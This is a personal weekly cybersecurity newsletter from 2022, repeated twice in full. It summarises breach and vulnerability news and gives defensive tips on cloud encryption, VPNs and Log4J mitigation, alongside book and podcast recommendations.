Cybersecurity And Much More Newsletter — Week 13 (2022)
Greetings, friends.
Welcome to my weekly newsletter, if you are not yet subscribed, please do. It might include books, articles, tech, tips, and of course interesting stuff about cybersecurity.
Enjoy!
What’s Happening
🚨 Criminals use fake EDRs to steal sensitive customer data from providers
Both Apple and Meta were tricked by fake EDRs (Emergency Data Requests) into providing sensitive user information.
EDRs are used by law enforcement to request users’ sensitive information without a warrant or subpoena in case of life-or-death situations.
The issue is the lack of proper mechanisms to test the validity of an EDR, search warrant, or subpoena.
🍎 New Apple macOS and iOS Zero Days, the 5th time this year
These new Zero-Day vulnerabilities allow attackers to access or disrupt kernel activity. The vulnerabilities appear to be due to an “out-of-bound Read” in the Intel Graphics Driver of MacOS that allow the application to read kernel memory and other flaws in AppleAVD, Accelerate Framework, and AVEVideoEncoder that can allow applications to execute arbitrary code with kernel privileges.
📰 Lapsus$ gang claims new hack with data from Apple, Abbott, Facebook, and more
They are back, and this time they claimed to have stolen 70GB of data from Apple, Facebook, Abbott, Globant, DHL, and more. Most of them did not confirm any of the breaches yet, except Globant where they mentioned that the data accessed by the criminals was very limited and did not find any evidence of broader impact.
👾 Log4J is still around and causing more problems, now it’s VMWare
It has been 4 months now that Log4J is terrifying cyberspace, and it doesn’t seem that things are getting any better. The Chinese threat group known as [Deep Panda] exploited Log4J vulnerabilities in VMWare Horizon servers to deploy backdoors and rootkits to exfiltrate data.
👾 New Exploit added to Beastmode Botnet
The operators behind Mirai-based DDoS botnet “Beastmode” added new exploits to their toolkit for Totolink routers, and it exploits the following Totolink vulnerabilities:
The Beastmode botnet also includes exploits for the following issues:
📱 Why Apple’s hardware subscription service could be a ‘huge deal for the company’
You might not need to get a second mortgage on your house 🏠 to get the latest MacBook pro! Woohoo! 🎉
Apple reportedly plans to launch a subscription model for devices, in a move that could expand its market to a whole new class of consumers who can’t afford to pay $1,500 for an iPhone or four times that for a laptop with keys that get stuck, almost no ports, and not able to detect external displays.
This sounds like good news to consumers, but in reality, it will be more beneficial to the manufacturer by offering a more steady quarterly revenue.
Some Security Tips
☁️ Sometimes it’s a good idea to encrypt your files before uploading them to the cloud
It might sound complicated for the average user, but it’s not. In just three steps, you can encrypt your data and upload it to your cloud storage space, all this without any technical knowledge.
What can go wrong? The worst scenarios are when you lose access to your information because you lost the decryption key or when you misplace the key and someone else gets access to your data.
To make it more simple, you can use a software like Cryptomator and only follow a few steps to encrypt your data:
- Download the encryption software.
- Create a vault (secure folder).
- Create a directory for each of your cloud storage accounts.
- Secure your directories with a strong password.
- Put your files in the secure folder you just protected by a password.
Is it secure? Well, it encrypts your data using industry-standard encryption (AES-256), its code is open source and is publicly tested by security professionals.
Does it respect my privacy? It is GDPR compliant.
🚇 Are Free VPNs Trusted, what should I do?
Free isn’t usually Free 🫠, in most cases, it means that you are the product, the vendor is using your data, or worse than that, the software itself is malicious.
Be assured, it’s almost the case with paid VPNs too where vendors give government agencies access to your data for national security reasons, and sometimes sell you personal data for profit or use it to enhance their service.
I know, I might confuse you?!? isn’t 😕
Do your research before using any App not just VPNs, but be more due diligent when it’s about security software. There are a lot of legitimate and trusted paid VPN providers, but also providers offering free VPNs Applications as part of their security of privacy suite.
ProtonVPN is one of the trusted providers with a suite of secure email and privacy tools. 😎 It does not keep any logs, runs across all platforms, has a k*ll switch, and is FREE.
🛠 Tools that can be handy when dealing with Log4J 🐚
Since Log4J risks are still out there. As a reminder, here are some of the actions you can take to reduce your exposure to the risks related to Log4J:
- Patching: it doesn’t seem that’s the ultimate solution for Log4J these days, but it’s the least you can do. So, get the latest patches as a first step.
- Hardening: Disable Log4J library and JNDI lookups (or remote codebase)
- Preventing: deploy properly configured web application firewalls. You can also apply the Log4J vaccine created by Cybereason.
- Detection: You can use this script to detect Log4J exploitation attempts.
- Hunting: Look for IOCs (Indicator Of Compromise), including the Log4J hashes within your environment.
You can check CISA’s Log4J mitigation guidance for more details and resources.
Some Security Concepts
📝 Note — 🔐 Security — Data Protection 💽 — What should be the first step in a DLP program?
Big companies usually rush to buy the latest and greatest tools and hire one of the big4 to help get their data protection programs up and running. However, most of them fail because of ignoring the root cause of their DLP gaps and the foundations of managing information in general.
You can’t protect what you don’t know, this means that your first step is to discover all your data and identify what is sensitive and what’s not.
Just by following the best practices of secure system configuration and Identity management, you can reduce drastically the exposure of your sensitive information.
Stay tuned for more Data Protection content!
📝 Note — 📡 Telco/IoT Security — 5G Security Enhancements
5G benefits aren’t just resumed in the high speed, low latency, and massive connectivity. It’s about the use case that 5G made a better reality like: Telemedicine, Virtual Reality, 3D, Smart cities. But most importantly, the enhanced security ad privacy compared to the previous generation of cellular networks.
- More privacy for users by concealing the subscriber’s identity.
- Enhanced Authentication Framework that’s access agnostic, more flexible, and offers better key hierarchy.
- Advanced Interconnect Security and Integrity Protection to help with Control and User Plane security, especially in Roaming scenarios.
- Service-Based Interface Security and Zero Trust.
- Secure Session Establishment to protect against over-the-air attacks.
Stay tuned for more Telco and IoT Security content!
My Favorites
⚛️ Swiss quantum computing company claiming a world-first discovery🇨🇭
The Swiss quantum computing company “Terra Quantum” announced on 3/31/22 a world-first discovery that is believed to be one of the largest funding rounds in the history of the quantum tech space.
Their discovery will be a game-changer that will break the fundamental limits of power dissipation and will make transistors more capable of handling the generated heat.
If you want to read the research article, check out the link below.
Declaimer: like all the research articles, the efforts to make it unreadable and make the research look more complicated than it is seemed almost equivalent to the scientific work itself. JK 😂
✍️ Can weekly prednisone treat obesity?
Obese mice that were fed a high-fat diet and that received prednisone one time per week had improved exercise endurance, got stronger, increased their lean body mass, and lost weight, reports a new study. The mice also had increased muscle metabolism. The once-weekly prednisone promoted nutrient uptake into the muscles.
🦷 Writing Google reviews about patients is a HIPAA violation!
In the past few years, the phrase “HIPAA violation” has been thrown around a lot, often incorrectly. People have cited the law, which protects patient health information, as a reason they can’t be asked if they’re vaccinated or get a doctor’s note for an employer. But what happened when a doctor replies to a google review? Believe it or not, it’s a HIPAA violation!
📚 🤔 Books I’m Currently Reading
Title: Not Dead Yet: The Memoir
Author: Phil Collins
Overview:
In his much-awaited memoir, Not Dead Yet, he tells the story of his epic career, with an encouraging debut at age 11 in a crowd shot from the Beatles’ legendary film A Hard Day’s Night. A drummer since almost before he could walk, Collins received on-the-job training in the seedy, thrilling bars and clubs of the 1960s swinging London before finally landing the drum seat in Genesis.
Soon, he would step into the spotlight on vocals after the departure of Peter Gabriel and begin to stockpile the songs that would rocket him to international fame with the release of Face Value and “In the Air Tonight.” Whether he’s recalling jamming with Eric Clapton and Robert Plant, pulling together a big band fronted by Tony Bennett, or writing the music for Disney’s smash-hit animated Tarzan, Collins’s storytelling chops never waver. And of course, he answers the pressing question on everyone’s mind: just what does “Sussudio” mean?
Not Dead Yet is Phil Collins’s candid, witty, unvarnished story of the songs and shows, the hits and pans, his marriages and divorces, the ascents to the top of the charts and into the tabloid headlines. As one of only three musicians to sell 100 million records both in a group and as a solo artist, Collins breathes rare air but has never lost his touch at crafting songs from the heart that touch listeners around the globe. That same touch is on magnificent display here, especially as he unfolds his harrowing descent into darkness after his “official” retirement in 2007, and the profound, enduring love that helped save him.
This is Phil Collins as you’ve always known him, but also as you’ve never heard him before.
📚 🤩 Books I Recommend Reading
Title: Clockwork: Design Your Business to Run Itself
Author: Mike Michalowicz
Overview:
If you’re like most entrepreneurs, you started your business so you could be your boss, make the money you deserve, and live life on your terms. In reality, you’re bogged down in the daily grind, constantly putting out fires, answering an endless stream of questions, and continually hunting for cash.
Now, Mike Michalowicz, the author of Profit First and other small-business bestsellers, offers a straightforward step-by-step path out of this dilemma. In Clockwork, he draws on more than six years of research and real-life examples to explain his simple approach to making your business ultra-efficient.
Among other powerful strategies, you will discover how to:
- Make your employees act like owners: Free yourself from micromanaging by using a simple technique to empower your people to make smart decisions without you.
- Pinpoint your business’s most important function: Unleash incredible efficiency by identifying and focusing everyone on the one function that is most crucial to your business.
- Know what to fix next: Most entrepreneurs try to fix every inefficiency at once and end up fixing nothing. Use the “weakest link in the chain” method to find the one fix that will add the most value now.
Whether you have a staff of one, one hundred, or somewhere in between, whether you’re a new entrepreneur or have been overworked and overstressed for years, Clockwork is your path to finally making your business work for you.
🎙 Podcast — Darknet Diaries Episode 111 is about the most famous banking trojan, ZeuS — Designed to steal money from online bank users’ accounts. This trojan became so big, that it resulted in one of the biggest FBI operations ever.
🎥 Videos — Every Engine Layout Explained. Did you ever wonder what is the difference between an I-6 and a V-6 engine? Well personally, nothing would change my mind about BMW’s naturally aspirated I-6 engines 😄, they are bulletproof and really fun to drive. However, there are some unique ones out there too, like Audi’s V5 engines, or Subaru’s Boxer engines.
Quote of the Week
“Great spirits have always encountered violent opposition from mediocre minds.” Albert Einstein
If you’re interested in starting a career in Cybersecurity, watch this one, and don’t forget to subscribe to my channel and leave a comment if there are any topics you’re interested in seeing on my next videos.
Check my other stuff here.
Greetings, friends.
Welcome to my weekly newsletter, if you are not yet subscribed, please do. It might include books, articles, tech, tips, and of course interesting stuff about cybersecurity.
Enjoy!
What’s Happening
🚨 Criminals use fake EDRs to steal sensitive customer data from providers
Both Apple and Meta were tricked by fake EDRs (Emergency Data Requests) into providing sensitive user information.
EDRs are used by law enforcement to request users’ sensitive information without a warrant or subpoena in case of life-or-death situations.
The issue is the lack of proper mechanisms to test the validity of an EDR, search warrant, or subpoena.
🍎 New Apple macOS and iOS Zero Days, the 5th time this year
These new Zero-Day vulnerabilities allow attackers to access or disrupt kernel activity. The vulnerabilities appear to be due to an “out-of-bound Read” in the Intel Graphics Driver of MacOS that allow the application to read kernel memory and other flaws in AppleAVD, Accelerate Framework, and AVEVideoEncoder that can allow applications to execute arbitrary code with kernel privileges.
📰 Lapsus$ gang claims new hack with data from Apple, Abbott, Facebook, and more
They are back, and this time they claimed to have stolen 70GB of data from Apple, Facebook, Abbott, Globant, DHL, and more. Most of them did not confirm any of the breaches yet, except Globant where they mentioned that the data accessed by the criminals was very limited and did not find any evidence of broader impact.
👾 Log4J is still around and causing more problems, now it’s VMWare
It has been 4 months now that Log4J is terrifying the cyberspace, and it doesn’t seem that things are getting any better. The Chinese threat group known as [Deep Panda] exploited Log4J vulnerabilities in VMWare Horizon servers to deploy backdoors and rootkits to exfiltrate data.
👾 New Exploit added to Beastmode Botnet
The operators behind Mirai-based DDoS botnet “Beastmode” added new exploits to their toolkit for Totolink routers, and it exploits the following Totolink vulnerabilities:
The Beastmode botnet also includes exploits for the following issues:
📱 Why Apple’s hardware subscription service could be a ‘huge deal for the company’
You might not need to get a second mortgage on your house 🏠 to get the latest MacBook pro! Woohoo! 🎉
Apple reportedly plans to launch a subscription model for devices, in a move that could expand its market to a whole new class of consumers who can’t afford to pay $1,500 for an iPhone or four times that for a laptop with keys that get stuck, almost no ports, and not able to detect external displays.
This sounds like good news to consumers, but in reality, it will be more beneficial to the manufacturer by offering a more steady quarterly revenue.
Some Security Tips
☁️ Sometimes it’s a good idea to encrypt your files before uploading them to the cloud
It might sound complicated for the average user, but it’s not. In just three steps, you can encrypt your data and upload it to your cloud storage space, all this without any technical knowledge.
What can go wrong? The worst scenarios are when you lose access to your information because you lost the decryption key or when you misplace the key and someone else gets access to your data.
To make it more simple, you can use a software like Cryptomator and only follow a few steps to encrypt your data:
- Download the encryption software.
- Create a vault (secure folder).
- Create a directory for each of your cloud storage accounts.
- Secure your directories with a strong password.
- Put your files in the secure folder you just protected by a password.
Is it secure? Well, it encrypts your data using industry-standard encryption (AES-256), its code is open source and is publicly tested by security professionals.
Does it respect my privacy? It is GDPR compliant.
🚇 Are Free VPNs Trusted, what should I do?
Free isn’t usually Free 🫠, in most cases, it means that you are the product, the vendor is using your data, or worse than that, the software itself is malicious.
Be assured, it’s almost the case with paid VPNs too where vendors give government agencies access to your data for national security reasons, and sometimes sell you personal data for profit or use it to enhance their service.
I know, I might confuse you?!? isn’t 😕
Do your research before using any App not just VPNs, but be more due diligent when it’s about security software. There are a lot of legitimate and trusted paid VPN providers, but also providers offering free VPNs Applications as part of their security of privacy suite.
ProtonVPN is one of the trusted providers with a suite of secure email and privacy tools. 😎 It does not keep any logs, runs across all platforms, has a k*ll switch, and is FREE.
🛠 Tools that can be handy when dealing with Log4J 🐚
Since Log4J risks are still out there. As a reminder, here are some of the actions you can take to reduce your exposure to the risks related to Log4J:
- Patching: it doesn’t seem that’s the ultimate solution for Log4J these days, but it’s the least you can do. So, get the latest patches as a first step.
- Hardening: Disable Log4J library and JNDI lookups (or remote codebase)
- Preventing: deploy properly configured web application firewalls. You can also apply the Log4J vaccine created by Cybereason.
- Detection: You can use this script to detect Log4J exploitation attempts.
- Hunting: Look for IOCs (Indicator Of Compromise), including the Log4J hashes within your environment.
You can check CISA’s Log4J mitigation guidance for more details and resources.
Some Security Concepts
📝 Note — 🔐 Security — Data Protection — What should be the first step in a DLP program?
Big companies usually rush to buy the latest and greatest tools and hire one of the big4 to help get their data protection programs up and running. However, most of them fail because of ignoring the root cause of their DLP gaps and the foundations of managing information in general.
You can’t protect what you don’t know, this means that your first step is to discover all your data and identify what is sensitive and what’s not.
Just by following the best practices of system security configuration and Identity management, you can reduce drastically the exposure of your sensitive information.
Stay tuned for more Data Protection content!
📝 Note — 📡 Telco/IoT Security — 5G Security Enhancements
5G benefits aren’t just resumed in the high speed, low latency, and massive connectivity. It’s about the use case that 5G made a better reality like: Telemedicine, Virtual Reality, 3D, Smart cities. But most importantly, the enhanced security ad privacy compared to the previous generation of cellular networks.
- More privacy for users by concealing the subscribers' identity
- More security
Stay tuned for more Telco and IoT Security content!
My Favorites
⚛️ Swiss quantum computing company claiming a world-first discovery🇨🇭
The Swiss quantum computing company “Terra Quantum” announced on 3/31/22 a world-first discovery that is believed to be one of the largest funding rounds in the history of the quantum tech space.
Their discovery will be a game-changer that will break the fundamental limits of power dissipation and will make transistors more capable of handling the generated heat.
If you want to read the research article, check out the link below.
Declaimer: like all the research articles, the efforts to make it unreadable and make the research look more complicated than it is seemed almost equivalent to the scientific work itself. JK 😂
✍️ Can weekly prednisone treat obesity?
Obese mice that were fed a high-fat diet and that received prednisone one time per week had improved exercise endurance, got stronger, increased their lean body mass, and lost weight, reports a new study. The mice also had increased muscle metabolism. The once-weekly prednisone promoted nutrient uptake into the muscles.
🦷 Writing Google reviews about patients is a HIPAA violation!
In the past few years, the phrase “HIPAA violation” has been thrown around a lot, often incorrectly. People have cited the law, which protects patient health information, as a reason they can’t be asked if they’re vaccinated or get a doctor’s note for an employer. But what happened when a doctor replies to a google review? Believe it or not, it’s a HIPAA violation!
📚 🤔 Books I’m Currently Reading
Title: Not Dead Yet: The Memoir
Author: Phil Collins
Overview:
In his much-awaited memoir, Not Dead Yet, he tells the story of his epic career, with an encouraging debut at age 11 in a crowd shot from the Beatles’ legendary film A Hard Day’s Night. A drummer since almost before he could walk, Collins received on-the-job training in the seedy, thrilling bars and clubs of the 1960s swinging London before finally landing the drum seat in Genesis.
Soon, he would step into the spotlight on vocals after the departure of Peter Gabriel and begin to stockpile the songs that would rocket him to international fame with the release of Face Value and “In the Air Tonight.” Whether he’s recalling jamming with Eric Clapton and Robert Plant, pulling together a big band fronted by Tony Bennett, or writing the music for Disney’s smash-hit animated Tarzan, Collins’s storytelling chops never waver. And of course, he answers the pressing question on everyone’s mind: just what does “Sussudio” mean?
Not Dead Yet is Phil Collins’s candid, witty, unvarnished story of the songs and shows, the hits and pans, his marriages and divorces, the ascents to the top of the charts and into the tabloid headlines. As one of only three musicians to sell 100 million records both in a group and as a solo artist, Collins breathes rare air but has never lost his touch at crafting songs from the heart that touch listeners around the globe. That same touch is on magnificent display here, especially as he unfolds his harrowing descent into darkness after his “official” retirement in 2007, and the profound, enduring love that helped save him.
This is Phil Collins as you’ve always known him, but also as you’ve never heard him before.
📚 🤩 Books I Recommend Reading
Title: Clockwork: Design Your Business to Run Itself
Author: Mike Michalowicz
Overview:
If you’re like most entrepreneurs, you started your business so you could be your boss, make the money you deserve, and live life on your terms. In reality, you’re bogged down in the daily grind, constantly putting out fires, answering an endless stream of questions, and continually hunting for cash.
Now, Mike Michalowicz, the author of Profit First and other small-business bestsellers, offers a straightforward step-by-step path out of this dilemma. In Clockwork, he draws on more than six years of research and real-life examples to explain his simple approach to making your business ultra-efficient.
Among other powerful strategies, you will discover how to:
- Make your employees act like owners: Free yourself from micromanaging by using a simple technique to empower your people to make smart decisions without you.
- Pinpoint your business’s most important function: Unleash incredible efficiency by identifying and focusing everyone on the one function that is most crucial to your business.
- Know what to fix next: Most entrepreneurs try to fix every inefficiency at once and end up fixing nothing. Use the “weakest link in the chain” method to find the one fix that will add the most value now.
Whether you have a staff of one, one hundred, or somewhere in between, whether you’re a new entrepreneur or have been overworked and overstressed for years, Clockwork is your path to finally making your business work for you.
🎙 Podcast — Darknet Diaries Episode 111 is about the most famous banking trojan, ZeuS — Designed to steal money from online bank users’ accounts. This trojan became so big, that it resulted in one of the biggest FBI operations ever.
🎥 Videos — Every Engine Layout Explained. Did you ever wonder what is the difference between an Inline-6 and V6 engine? Well personally, nothing would change my mind about BMW's naturally aspirated I-6 engines 😄 , they are bulletproof and really fun to drive. However, there are some unique ones out there too, like Audi’s V5 engines, or Subaru’s Boxer engines.
Quote of the Week
“Great spirits have always encountered violent opposition from mediocre minds.” Albert Einstein
